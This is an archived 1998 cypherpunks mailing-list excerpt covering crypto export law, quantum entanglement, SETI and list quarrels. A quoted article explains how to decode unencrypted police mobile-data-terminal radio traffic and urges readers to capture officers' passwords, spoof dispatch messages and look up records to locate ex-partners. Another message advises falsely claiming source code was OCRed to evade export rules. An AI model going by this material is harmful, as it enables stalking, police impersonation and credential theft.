>>>outside the US to replace the missing pieces.
>>
>>Or you could just publish the source code in a big book...  ]:>

>Or even easier option:

>Dispense with the actual scanning and OCRing and simply _say_ the code
>was OCRed. Or, for that matter, don't even bother to say. U.S. Customs
>and the ITARs/EARs have no provisions for asking international users if
>the version they are using was compiled from source code printed in
>books!

>(This was my recommended approach for the PGP job...use the code off the
>CD-ROM, carried out in someone's luggage or mailed or sent over the Net,
>and then _say_ the OCRing was done....it's not as if U.S. Customs has any
>authority to question someone in Amsterdam or Denmark and demand proof
>that they really spent those hundreds of hours laboriously scanning and
>OCRing and proofreading....)

>Why do things the hard way?

>Seriously, when the code people use internationally is used, just who the
>hell cares whether it was ever scanned from a book or not? That only
>affects the issue of _export_, which is mooted anyway by the utter
>triviality of exporting software on CD-ROMs, DATs, through the mail, via
>FedEx and Airborne, through remailers, and on and on and on. Nobodu using
>"PGP International Version" has to worry one whit, no pun intended, about
>whether the code came from an original PGP distribution, or source code
>scanned and OCRed, so long as it checks out properly.

I think that this was a legal decision by PGP, Inc. not out of concern by
the people doing the scanning overseas. I believe that they were trying to
sheild themselves from another lenghty court battle with the Feds but
still be able to make the source code available.

Unfortunatly PGP is nolonger the product of crypto-anarchists but is now
owned by the "suits" who tend to tread lightly in such matters
(shareholders realy don't care about crypto-anarchy principles unless
there is financial gain in doing so).

-- 
---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
---------------------------------------------------------------
 
Tag-O-Matic: "640K ought to be enough for anybody." - Bill Gates, 1981





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Oswald <joswald@rpkusa.com>
Date: Thu, 29 Jan 1998 03:21:04 +0800
To: "'John Young'" <cypherpunks@toad.com>
Subject: RE: Announcement: RPK InvisiMail released on 12 Jan, 1998
Message-ID: <01BD2BDC.19144440@joswald@rpkusa.com>
MIME-Version: 1.0
Content-Type: text/plain



It seems that there is some confusion WRT to the origin  of this product. 
 The encryption technology was developed in New Zealand.  The application 
itself was developed on the Isle of Man (British Isles).  As a result, the 
US gov't has had nothing to do with the product and therefore none of the 
"concerns" represented in the previous message have any merit.  What was 
meant by use of "honey" is that if you pick a fight with a government 
official, they will be happy to fight back.  If you complement them on 
their farsighted visionary non-meddling approach you get a very different 
response.  Our experience has been that we get a reasonable response from 
the NZ government that does not restrict the security that our products 
offer nor in the way that we choose to do business.

Jack

-----Original Message-----
From:	John Young [SMTP:jya@pipeline.com]
Sent:	Tuesday, January 27, 1998 4:02 PM
To:	cypherpunks@toad.com
Cc:	Jack Oswald
Subject:	RE: Announcement: RPK InvisiMail released on 12 Jan, 1998

On "using honey not vinegar" rationale of RPK InvisiMail for
obtaining crypto export licenses:

Applied Cryptography, Bruce Schneier, 2nd Edition, pp. 215-16

Algorithms for Export

Algorithms for export out of the United States must be approved
by the U.S. government (actually, by the NSA--see Section 25.1)
It is widely believed that these export-approved algorithms can
be broken by the NSA. Although no one has admitted this on the
record, these are some of the things the NSA is rumored to privately
suggest to companies wishing to export their cryptographic products:

  - Leak a key bit once in a while, embedded in the ciphertext.

  - "Dumb down" the effective key to something in the 30-bit range.
  For example, while the algorithm might accept a 100-bit key, most
  of those keys might be equivalent.

  - Use a fixed IV, or encrypt a fixed header at the beginning of
  each encrypted message. This facilitates a known-plaintext attack.

  - Generate a few random bytes, encrypt them with the key, and then
  put both the plaintext and the ciphertext of those random bytes at
  the beginning of the encrypted message. This also facilitates a
  known-plaintext attack.

NSA gets a copy of the source code, but the algorithm's details remain
secret from everyone else. Certainly no one advertises any of these
deliberate weaknesses, but beware if you buy a U.S. encryption product
that has been approved for export.

-----

Bruce added the last "beware" phrase to the 2nd edition.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 29 Jan 1998 02:33:00 +0800
To: cypherpunks@cyberpass.net
Subject: Quantum teleportation and communication
In-Reply-To: <199801280442.WAA04344@einstein.ssz.com>
Message-ID: <v0310280ab0f49f56d208@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




Steve asked in another message about where one learns about some of this
stuff. As always, "Scientific American" is a good place to look for
articles. They've had many articles on Bell's Theorem, nonlocality, the EPR
paradox/nonparadox, the Aharanov-Bohm results, and quantum teleportation. A
SciAm article will explain, with pictures, in ways we can't here. (Plus the
articles are carefully written, by experts--we waste too much time here
getting lost in misunderstandings about the meanings of terms of art.)
"Science News" is sometimes good, too. And "New Scientist" and "Nature."
Any library should have plenty of articles.

There are also dozens of popular books on these subjects, ranging from "In
Search of Schrodinger's Cat" to "Where Does the Weirdness Go?"

And the Web of course has vast resources. Just taking a glance, I see 2000
hits on "quantum teleportation" with HotBot. And 200 hits on "faster than
light communication," for example. Other, more refined searches are trivial
to do. Some of these articles are reviews, some are primers, some are
pointers to more info.


Anyway, back to "quantum weirdness," which, so far, has not looked very
weird. (To me, at least. But, like most physicists, it seemed weird to me
at first but then became "just the way things are" after a few months.)


At 9:20 PM -0800 1/27/98, Steve Schear wrote:

>I don't understand why a command/synch channel is required.  Why aren't the
>coding techniques commonly used in telecom and disk data encoding adequate
>to both synchonize and convey data?

Imagine a pair of photons sent in opposite directions. With different
polarizations, but "tangled." Observer A measures a polarization of "1."

He then knows that Observer B will measure "0."

All that is revealed is a _correlation_, a kind of structure built into the
Universe. Interesting, but not so weird as it seems.  (And this is not any
kind of "action at one site instantaneously changing the state far away."
No more so than sending two envelopes out, one with a "1" inside and the
other with a "0" inside changes things instantaneously.....)

No signal sending is possible because neither observer can "change" the
polarization of a photon. They can certainly pick a sequence of photons to
measure, and thus get various polarization values. But it can't send a
"message" to the other site because the series of photons picked forms the
key, and that key must itself be sent. Similarities to one time pads,
obviously.

More info in the sources named. Avoid the pop science treatments by Nick
Herbert, unless other, more mainstream sources are also consulted at the
same time. And definitely avoid the "psi" nonsense of Jack Sarfatti.

Gribbin's books are pretty good.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 29 Jan 1998 03:11:33 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356(fwd)
In-Reply-To: <199801281428.IAA06743@einstein.ssz.com>
Message-ID: <v03102800b0f52ca3a7fc@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:28 AM -0600 1/28/98, Jim Choate wrote:
>Forwarded message:
>
>> Date: Tue, 27 Jan 1998 23:44:50 -0800
>> From: Steve Schear <schear@lvdi.net>
>> Subject: Re: Planetary rovers, SETI and other musings, was Re: update.356
>>  (fwd)
>
>> I guess I'm over my head in such matters.  From my, admitedly, shallow
>> understanding of wave function collapse, etc., I was under the apparent
>> misimpression that once collapsed (e.g., by Alice entangling a 'modulation'
>> photon M (of a known polarization) with one member (photon A) of an
>> entangled pair, one of which was sent to Alice and the other (photon B)
>> which was sent to Bob, photon B's polarization state was determined and
>> could not subsequently be altered by Bob's measurement with his receiver.
>> Could you recommend a good article which explain this paradox to a
>> non-quantum mechanic?
>
>The state is determined *at the time of collapse*. Once the collapse occurs
>the synchronization is no longer present and subsequent events can indeed
>alter the polarization of one particle without altering the other. Simply
>bouncing that photon via refraction off a surface can alter the
>polarization.

If that is the case, I still don't understand why and out-of-band signal is
required.  If the sender collapses the wave function shortly before the
signal reaches the intended receiver its unlikely to have changed
polarization again.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 29 Jan 1998 03:21:33 +0800
To: Ray Arachelian <cypherpunks@toad.com
Subject: Re: Spyking snips: Police MDT's + cia/russian spying
In-Reply-To: <Pine.SUN.3.96.980128130055.27062A-100000@beast.brainlink.com>
Message-ID: <3.0.5.32.19980128110542.007f5a70@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 01:03 PM 1/28/98 -0500, Ray Arachelian wrote:
>2)From: "Brandon Robinson" <brobinson@navicom.com>
>Subject: Re: Monitoring MDT's 
>
>>14)From: "self destruct" <<slfdstrct@email.msn.com>
>>Subject: Monitoring MDT's
>>hi all,....i am wondering if there is a way to monitor police MDT's
>>(mobile display terminals)
>>i have the frq. that they use but i dont know how to hook up a scanner to
>>p/c. any thoughts would be appreciated thank you
>
>Since no one else seemed to respond to this, I guess I will...first off
>M.D.T. stands for (Mobile Data Terminals), I got this posting off some
>group I can't really remeber where from, but it is informative, and was
>the
>subject of a Feb, '97 "911Dispatcher Magazine" story. It should answer all
>of your questions, I also have a list of some places where you can buy the
>unit pre-made, or a kit to make your own. I have left the Source code out
>on purpose as it is rather lengthy, if you want it I can send it to you. 
>
>-BBR
>----------------------- Begin quoted article ----------------------
>
>>From lord@heaven.com Mon Dec 23 23:11:43 EST 1996
>Article: 44420 of alt.radio.scanner
>Subject: MDT stuff
>
>Greetings one and all,
>
>Have you ever lusted to decode Mobile Data Terminal (MDT)
>tranmissions? Have you ever wanted to see the same NCIC and motor
>vehicle information that law enforcement officers see? Have you ever
>wanted to see what officers send to each other over "private" channels?
>And all this with an interface you can build with only a few dollars
>worth of parts from your local radio shack?
>
>If so this posting might be your rendevous with destiny. The tail
>end of this posting includes the source code of a program that decodes
>and displays MDT messages. It stores roughly 30k of messages in a buffer
>and then writes the whole buffer to a file called "data.dat" before
>terminating. The program may be interrupted at any time by pressing any
>key (don't use control-c) at which point it writes the partially filled
>buffer to "data.dat". This program only works for systems built by
>Motorola using the MDC4800 tranmission protocol. This accounts for a
>large fraction of public service MDT systems as well other private
>systems.
>
>The existence of this program is ample evidence that Motorola has
>misrepresented its MDT systems when it marketed them as a secure means
>of communcications. The interested reader will soon discover that these
>systems do not use any form of encryption. Security concerns instead
>have been dealt with by using a code. "And what might this code be
>called?" asks the reader. The code turns out to be plain ASCII. What
>follows is a brief description of how the program and the MDC4800
>protocol work. If you don't understand something go to your local
>library and check out a telecommunications theory book.
>
>1. The raw transmission rate is 4800 baud. The program's interrupt
>service routine simply keeps track of the time between transitions. If
>you're receiving a perfect signal this will be some multiple of 1/4800
>seconds which would then give you how many bits were high or low. Since
>this is not the best of all possible worlds the program instead does the
>following: transitions are used to synchronize a bit clock. One only
>samples whenever this clock is in the middle of the bit to produce the
>raw data stream. This greatly reduces jitter effects.
>
>2. Whenever a tranmitter keys up the MDC4800 protocol calls for bit
>synchronization (a sequence of 1010101010101010....). In the program
>this will result in receive bit clock synchronization. There is no need
>to specifically look for the bit sync.
>
>3. Look for frame synchronization in raw bit stream so that data
>frames can be broken apart. Frame synchronization consists of a 40 bit
>sequence : 0000011100001001001010100100010001101111. If this sequence is
>detected (or 35 out of 40 bits match up in the program) the system is
>idling and the next 112 bit data block is ignored by the program. If the
>inverted frame sync is detected one immediately knows that 112 bit data
>blocks will follow.
>
>4. Receive the 112 bit data block and undo the bit interleave. This
>means that one must reorder the bits in the following sequence : {0,16,
>32,48,64,80,96,1,17,33,49,65,81,97,2,18,34,...} if the orignal sequence
>were received as {0,1,2,3,4,5,6,7,8,...}.
>
>5. Check the convolutional error correcting code and count the
>number of errors. The error correcting code is rate 1/2 which means we
>will be left with 56 data bytes. The encoder is constructed so that the
>output consists of the original data bits interspersed with error
>correcting code. The generating polynomial used is :
>1 + X^-1 + X^-5 + X^-6
>Whenever an error is detected a counter is incremented. An attempt is
>made to correct some errors by finding the syndrome and looking for the
>bogus bit.
>
>6. Keep receiving 112 bit data blocks until either a new frame sync
>is found or two consecutive data blocks have an unacceptably large
>number of errors.
>
>7. Each data block consists of six data bytes; the last 8 bits are
>status bits that are simply ignored. The program shows the data in two
>columns - hexadecimal and ASCII. This data is kept in a buffer and is
>written to the file "data.dat" when the program terminates.
>
>8. What the program doesn't do: As a further check on the data
>there can be CRC checks. This varies from protocol to protocol so this
>program does not implement the CRC checks. Nonetheless, it is a
>relatively trivial matter to find the generating polynomial. The
>addresses, block counts, and message ID numbers are also quite easy to
>deduce.
>
>As you can see, there is no encryption. The bit interleave and the error
>correcting coding are there solely to insure the integrity of the ASCII
>data. Since any moron could have figured this stuff out from scratch one
>could argue that MDTs do not use "...modulation parameters intentionally
>witheld from the public". Therefore the Electronic Communications
>Privacy Act may not prohibit receiving MDT tranmissions. However,
>consult your attorney to make sure.
>
>The total disregard for security will no doubt annoy countless
>Motorola customers who were assured that their MDT systems were secure.
>Since Federal law states that NCIC information must be encrypted your
>local law enforcement agency might be forced to spend millions of
>dollars to upgrade to a secure MDT system - much to the delight of
>Motorola and its stockholders. Cynics might conclude that the release of
>a program like this is timed to coincide with the market saturation of
>existing MDT systems.
>
>Also, this program is completely free and it had better stay that
>way. What's to prevent you from adapting this into a kit and selling it
>>from classified ads in the back of Nuts and Volts? Nothing. But take a
>look at Motorola's patents sometime. You'll notice that this program
>does things that are covered by a shitload of patents. So any attempt to
>take financial advantage of this situtation will result in utter misery.
>
>Please keep the following in mind: this program only works with the
>first serial port (COM1). If your mouse or modem is there too bad. If
>you don't like this rewrite the program.
>
>------------------------------------------------------------------------
>What equipment do I need?
>
>RADIO SCANNER:
>
>A scanner that can receive 850-869 MHz. For those of you who don't
>know, this is the band where most business and public service trunked
>radio systems can be found along with the mobile data terminal
>transmissions. Chances are excellent that if your local authorities have
>a motorola trunked radio system and mobile data terminals that this is
>the frequency band in use. Very rarely will one find mobile data
>terminals in other frequency bands.
>
>Now for the fun part - your scanner should probably be modified to
>allow you to tap off directly from the discriminator output. If you wait
>until the signal has gone through the radio's internal audio filtering
>the waveform will likely be too heavily distorted to be decoded. This is
>exactly the same problem that our friends who like to decode pager
>transmissions run into - some of them have claimed they can only decode
>512 baud pager messages using the earphone output of their scanner.
>These mobile data terminal messages are 4800 baud so I don't think you
>have a snowball's chance in hell without using the discriminator output.
>If you don't know where to begin modifying your scanner you might want
>to ask those who monitor pagers how to get the discriminator output for
>your particular radio.
>
>COMPUTER/SCANNER INTERFACE
>
>Those of you who have already built your interface for decoding
>pager messages should be able to use that interface without any further
>ado. For those starting from scratch - you might want to check out
>packages intended for pager decoding such as PD203 and the interfaces
>they describe. The following excerpt gives an example of a decoder that
>should work just fine (lifted out of the PD203 POCSAG pager decoder
>shareware documentation):
>
>>
>> 0.1 uF |\ +12v
>> ---||-----------------------|- \|
>> AF IN | |741 \
>> ---- | | /--------------------- Data Out
>> | \ ------|+ /| | CTS (pin 5/8)
>> | / 100K | |/-12v | or DSR (pin 6/6)
>> | \ | |
>> GND / ----/\/\/\---- GND ------ GND (pin 7/5)
>> | | 100K
>> | \ N.B. Pin Numbers for com port are
>> GND / given as x/y, where x is for a 25
>> \ 10K way, y for a 9 way.
>> /
>> |
>> GND
>>
>> The above circuit is a Schmitt Trigger, having thresholds of about +/-
>1v.
>> If such a large threshold is not required, eg for a discriminator
>output,
>> then the level of positive feedback may be reduced by either reducing
>the
>> value of the 10K resistor or by increasing the value of the 100K
>feedback
>> resistor.
>>
>> The +/- 12v for the op-amp can be derived from unused signals on the COM
>> port (gives more like +/- 10v but works fine !):-
>>
>>
>> TxD (2/3) --------------|<-------------------------------------- -12v
>> | |
>> RTS (4/7) --------------|<-------- GND - -
>> | | _ + 10uF
>> --------->|------- - - |
>> Diodes 1N4148 | - + 10uF GND
>> | |
>> DTR (20/4) ------------->|-------------------------------------- +12v
>>
>
>If I were building this circuit I would strongly suggest tying the
>non-inverting (+) input of the op-amp to ground since you are working
>directly with the discriminator output and don't need a Schmitt trigger.
>All these parts or equivalents are easily available (even at your local
>Radio Shack which stocks the finest collection of components that have
>failed the manufacturer's quality control checks and supported by a
>sales staff that's always got the wrong answers to your questions).
>
>Also: DO NOT use the RI (ring indicator) as an input to the computer.
>-------------------------------------------------------------------------
>
>How do I check things?
>
>As a first step, I would get a package such as PD203 and use it to
>decode a few pages. If you can get that working you know that that your
>interface circuit is functioning correctly.
>
>If you are in a reasonably sized town you might be part of the
>ardis network. The ardis network is a nationwide commercial mobile data
>terminal network where one can send/receive E-mail messages from one's
>portable computer. It has been exclusively assigned the frequency of
>855.8375 MHz. Therefore, if you can hear digital bursts on this
>frequency you are basically guarranteed that these are MDC4800 type
>messages. You should be able to get stuff popping up on your screen
>although a lot of the messages will not be plain english.
>
>If your interface works but you can't seem to get any messages on
>the screen for a channel you know is a Motorola MDT system then it might
>be possible that your scanner/interface is putting out data with the
>polarity reversed. To check for this run the program with a command line
>arguement. When it runs you should an initial "Polarity reversed"
>message and hopefully then things will work out for you.
>
>Other than that: if this program doesn't work pester someone else
>who has got it working. Don't bother pestering the author(s) of this
>posting; the shit(s) aka "she/he/it (s)" are afraid of a thousand
>lawyers from Motorola descending like fleas to infest their pubic hair
>and accordingly have decided to remain forever anonymous. No doubt
>someone on the usenet who sees this post will know what to do with this
>program and also hopefully rewrite into a more user friendly form. When
>you do please don't forget to release the source code.
>-------------------------------------------------------------------------
>Future projects/nightmares you might want to think about:
>
>Certain MDT systems embed formatting information in the text in the
>form of ESC plus [ plus a few more bytes. Someone might want to decode
>these on the fly and format the output so it looks exactly the same way
>as the user sees it.
>
>Make it so that this program works with com ports other than COM1.
>
>Make it user friendly?
>
>Enlarge the data buffer from the current 30k.
>
>Give the output data file an unique name each time the program is
>run instead of "data.dat".
>
>How about sorting through the past traffic so that you only see
>traffic to a specified user?
>
>The program does not cut data blocks off in the display but it
>might add an extra one or two (which will display as all zeroes).
>Someone might want to make all those zeroes be shown as blanks instead.
>
>Write some real instructions.
>
>Now the more ambitous stuff:
>
>Are you half-way competent with RF engineering? Then listen in to
>the tranmissions from the mobile units back to the base station. That
>way you get everyone's password and user IDs as they log on to the MDT
>system. By this point you will no doubt have been able to figure out all
>of the appropriate communications protocols so you should think about
>getting your own transmitter up and running along with the necessary
>program modifications so that you can transmit MDT messages. The
>required transmitter can be very simple - for example, those masocists
>who want to start from scratch might want to special order an
>appropriate crystal (pulling the frequency with the computer's tranmit
>signal), building a frequency multiplier chain, and adding a one watt RF
>amplifier to top it all off (see the appropriate ARRL publications for
>more information on radio techniques). Now you can log in and look at
>the criminal records and motor vehicle information on anybody you can
>think of. Find out what your neigbors are hiding. Find out who that
>asshole was that cut you off downtown. Find out where your former
>girl/boy friend is trying to hide from you. And on and on...
>Those with simpler tastes might want to simply transmit at the base
>station's frequency to any nearby MDT terminal - now you too can
>dispatch your local law enforcement agencies at the touch of your
>fingers!!! See your tax dollars at work tearing apart every seam of your
>neighbor's house. Or create strife and dissension in your local law
>enforcement agency as more and more officers come out of the closet
>using their MDTs trying to pick up fellow officers.
>
>There are municipalities that have put GPS receivers on all of
>their vehicles. Should it happen that the information is sent back over
>one of these networks you could have your computer give you a real-time
>map showing the position of every vehicle and how far away they are from
>you.
>
>Extend your knowledge to other data networks. Here you will want to
>look at the RAM mobile data network. It uses the MOBITEX protocol which
>is really easy to find information on. Since it is an 8 kilobaud GMSK
>signal there is a decent chance that you can use the interface described
>here. This transmission mode demmands much more from your equipment than
>MDT tranmissions. At the very least you must be much more careful to
>make sure you have adequate low frequency response. Despite this it is
>possible to receive and decode MOBITEX transmissions with a simple
>op-amp circuit! This just goes to show you what drivelling bullshit
>RAM's homepage is filled with - they explain in great detail how hackers
>will never be able to intercept user's radio tranmissions (incidentally
>explaining how to decode their tranmissions). The necessary program will
>be the proverbial exercise left for the reader. For better performance
>buy a dedicated MOBITEX modem chip and hook it up to your computer.
>
>----------------------------------------------------------------------
>
>A few words about the program:
>
>Remember - you must have your decoder hooked up to COM1. The RTS
>line will be positive and the DTR line negative but if you built the
>decoder with a bridge rectifier you really don't have to worry about
>their polarity. Stop the program by punching any key; don't use
>control-c or control-break!
>
>If you must reverse polarity run the program with any command line
>arguement (example: type in "mdt x" at the command line if your program
>is mdt.exe). You should then see the "Polarity Reversed." message pop up
>and hopefully things will then work.
>
>As far as compiling this - save the latter portion of this posting
>(the program listing) and feed it to a C compiler. Pretty much any C
>compiler from Borland should work. If you (Heaven Forbid) use a
>Microsoft C compiler you might need to rename some calls such as
>outport. Follow any special instructions for programs using their own
>interrupt service routines. This program is not object oriented. It also
>does not want anything whatsoever to do with Windows. Please don't even
>think about running this program under Windows. Finally, here it is:
>
>Good Luck and may God be with ya
>
>**************************************************************************
>
>Subject: More real spy stuff...
>
>Germany smuggled agent out of Russia
>
>Germany's Federal Intelligence Agency smuggled one of its Russian
>agents to safety while Russian President Boris Yeltsin and German
>Chancellor Helmut Kohl were meeting in Moscow last Nov., the weekly
>news magazine Focus said Monday. The BND had received a tip that a
>long-serving Russian agent was threatened and launched a cloak and
>dagger operation Nov. 29 to pull the agent out of Russia. The agent,
>a 32-year-old Army captain from the Russian town Samara with the code
>name "Coastal Fog," had given BND Russian military communications
>secrets for years. The rescue operation took place as Kohl and
>Yeltsin sat down for talks.
>
>Russian spies still fighting the Cold War in Britain
>
>Security sources say Moscow is as eager as ever to uncover
>defence secrets But now it is acting  more for economic than
>militaristic reasons. Security sources put Russian military
>espionage in Britain at the same level as it was in the 1980s.
>In a radio broadcast in December, President Yeltsin,
>speaking about Russia's intelligence aims, said:
>"Notwithstanding positive changes after the end of the
>Cold War, tough competition is still underway in the
>world. Competition for new technology and geo-political
>influence is increasing."
>
>Space Imagery Overhaul Aims at Better Data and Easier Access
>
>The shuttle flight is part of a massive modernization of the
>multibillion-dollar U.S. intelligence collection program. The goal
>is to compile a comprehensive view of the world from
>overhead -- using the shuttle, satellites, spy planes and missiles
>-- and to consolidate the data in a single computerized system
>accessible to civilian and military officials across the
>government.
>
>A CIA Target at Home in America
>By DANIEL C. TSANG
>Los Angeles Times January 18, 1998
>
>Because of me, the Central Intelligence Agency has had to concede it does 
>spy on Americans. Just last month, the agency had to remove a denial
>posted 
>on its Web site that it doesn't do this. For it kept a file on me
>throughout the 1980s and '90s--despite a law against political spying on
>Americans. 
>Just before Christmas, the CIA revised its Web site. The new version says 
>the CIA can keep files on Americans if they are suspected of espionage or
>international terrorism. But I am no spy or terrorist. The CIA conceded as 
>much by settling my lawsuit, paying my lawyers some $46,000 and promising
>to expunge my file and never spy on my political activities in the
>future.
>
>
>
>
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

``I'm going to the White House to get my presidential kneepads.''
ML Quote of the day      http://www.newsday.com/ap/rnmpwh0s.htm




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Thu, 29 Jan 1998 03:18:31 +0800
To: Bill Stewart <cypherpunks@cyberpass.net
Subject: Re: Planetary rovers, SETI and other musings, was Re:  update.356 (fwd)
In-Reply-To: <199801280418.WAA04044@einstein.ssz.com>
Message-ID: <v03102801b0f52e911c09@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



>>> Speaking of which, do the current SETI programs check for signal
>>> modulation using polarization.
>
>Speaking of SETI, their current intent is to do a distributed
>computation spread across thousands of computers, similar to some of the
>keycracking efforts.  Details at http://www.bigscience.com ;
>the Recent News section says they're currently trying to figure
>out about funding.  Meanwhile, there's www.mersenne.org for
>factoring big prime numbers.

One of the problems I have with SETI is that it assumes that a distant
civilization is sending out a beacon for others to home in on, and that
this beacon is a narrowband signal. What if most such civilizations aren't
looking for anyone and merely going about their own affairs, including
communications for their own needs?

Because of path losses it takes an incredibly strong narrowband signal to
traverse even relatively small cosmological distances and have any hope of
detection with our technology.  For example, Earth's strongest TV signals
could be detected by our present technology out to about 50 light years,
but no image reconstruction would be possible (insufficient S/N).  The
highest power transmitter-directional antenna, at Aricebo, can be heard to
about 300 light years, but its only transmitted a SETI beacon once and only
for a few minutes.

An excellent way to mitigate path loss is trading bandwidth for data rate.
GPS  garners an incredible 63 dB of process gain (or about a 2,000,0000
fold improvement) in this manner. If I was trying to send a electromagnetic
signal vast distances I'd use some form of spread spectrum.  Individually,
narrowband receivers are most insensitive to broadband 'noise' sources.
However, I wonder if it might be possible to configure the SETI@home
software to coordinate the narrowband channels signal analysis so as to
have a better chance of detecting broadband, pseudo-noise, signaling.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Thu, 29 Jan 1998 03:22:00 +0800
To: Ray Arachelian <cypherpunks@toad.com
Subject: Re: Spyking snips: Police MDT's + cia/russian spying
In-Reply-To: <Pine.SUN.3.96.980128130055.27062A-100000@beast.brainlink.com>
Message-ID: <3.0.5.32.19980128111443.007f14b0@206.40.207.40>
MIME-Version: 1.0
Content-Type: text/plain



At 01:03 PM 1/28/98 -0500, Ray Arachelian wrote:
>2)From: "Brandon Robinson" <brobinson@navicom.com>
>Subject: Re: Monitoring MDT's 
>
>>14)From: "self destruct" <<slfdstrct@email.msn.com>
>>Subject: Monitoring MDT's
>>hi all,....i am wondering if there is a way to monitor police MDT's
>>(mobile display terminals)
>>i have the frq. that they use but i dont know how to hook up a scanner to
>>p/c. any thoughts would be appreciated thank you


Hooking up a computer-controlled scanner, including
commercial software to do so: http://www.scancat.com/catalog.html

Other RF amusements:

commercial EM interference generator: http://www.ar-amps.com/main.htm

commercial RF tracking devices: http://www.ti.com/mc/docs/tiris/docs/size.htm

magnetron amusements: http://www.glubco.com/weaponry/mag.htm



------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

``I'm going to the White House to get my presidential kneepads.''
ML Quote of the day      http://www.newsday.com/ap/rnmpwh0s.htm




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 29 Jan 1998 01:16:26 +0800
To: cypherpunks@toad.com
Subject: Re: Tim May as censor??????????
In-Reply-To: <199801281519.JAA04493@pc1824.ibpinc.com>
Message-ID: <ygZ1Je20w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



"Roger J Jones" <cyber@ibpinc.com> writes:

> >Jeez, this is not "ChemPunks."
>
> >Calculating exothermic and endothermic yields (measured in "kcal/mole") for
> >various chemistry reactions was a central part of my sophomore chemistry
> >class in high school 30 years ago.
>
> >I suggest the question askers consult any of the most basic chemistry
> >textbooks.
>
> >--Tim May
>
> Tim,
> Can this be? Censorship from the man on the mountain? So unlike you......


In this particular case, it's not censorship to point out that the original
posted might get more complete and accurate information by consulting a
simple chemistry text[1] than by posing his question in a forum where
most people don't give a flying fuck about simple chemistry questions.
(He also wouldn't waste evebody's fucking time, but he clearly gives
even less of a fling fuck about other people's time than about his
own fucking time.)

[1] One really Good Thing Jim Bell could do while on probation is to
write a good simple chemistry book. "Stink Bombs for Dummies"
"How to make mustard gas in your own kitchen"

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 29 Jan 1998 01:44:12 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Measure of information-v-time (fwd)
Message-ID: <199801281739.LAA07399@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

As a result of a completely non-crypto interest a discussion recently came
up about how information worth/accuracy goes down with time. A proposal was
made that I thought might be of some interest as a base for discussions of
data havens and how to treat the relative worth of information.

Forwarded message:

> From: "Richard A. Flores" <cybernot@gte.net>
> Subject: Re: dates in UWPs?
> Date: Wed, 28 Jan 1998 10:33:49 -0600
> Reply-To: traveller@mpgn.com

> SD Mooney <dom@cybergoths.u-net.com> wrote:
> 
> >Put it [the date notation] in the extended data set (as posted
> >by Marc) as a single (hex) code eg M0 is 0, etc and expand
> >as new milieus arise. This removes the problem of linking to
> >the dating system and adding in a -tve for Milieus prior to
> >M0. I mean, an Ancients set would otherwise be -200000!
> >
> Perhaps a simple logarithmic notation.  Something like:
> code
> #    Years since last survey
> 0                0 to 3 years
> 1                3 to 7 years
> 2                7 to 20 years
> 3              20 to 55 years
> 4              55 to 148 years
> 5            148 to 403 years
> 6            403 to 1,097 years
> 7         1,097 to 2,981 years
> 8         2,981 to 8,103 years
> 9         8,103 to 22,026 years
> A      22,026 to 59,874 years
> B      59,874 to 162,755 years
> C    162,755 to 442,413 years
> D    442,413 to 1,202,604 years
> E 1,202,604 to 3,269,017 years
> F 3,269,017 to 8,886,111 years
> 
> This single hexadecimal # would give us a time scale beyond anyone's
> estimates of possible dates on useful intelligence.


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 29 Jan 1998 03:53:38 +0800
